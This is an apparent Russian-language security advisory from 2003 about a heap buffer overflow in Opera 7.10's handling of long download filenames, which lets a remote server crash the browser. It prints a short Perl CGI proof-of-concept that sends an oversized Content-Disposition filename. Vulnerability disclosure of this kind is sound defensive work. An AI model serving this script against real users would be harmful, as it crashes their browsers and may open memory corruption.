Переполнение буфера в Opera web browser

Дата публикации:
03.05.2003
Всего просмотров:
1107
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Отказ в обслуживании обнаружен в Opera web browser. Удаленный сервер может аварийно завершить работу браузера во время загрузки файла.

Переполнение буфера существует в обработке имени файла в процессе загрузки файла. Длинное имя файла приведет к аварийному завершению работы браузера.

Пример:

#!/usr/bin/perl
  # Smash Heap Memory.
  # This script is CGI program.

  $|=1;
  my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

  print "Content-type: text/html\r\n";
  print qq~Content-Disposition: filename="$filename"\r\n~;
  print "\r\n";
  print "<html><body>Love & Peace :)</body></html>\r\n";
Уязвимость обнаружена в Opera Web Browser 7.10 build 2840 и более ранних версиях

Ссылки: Long File Extension Heap Buffer Overrun Vulnerability in Download
или введите имя

CAPTCHA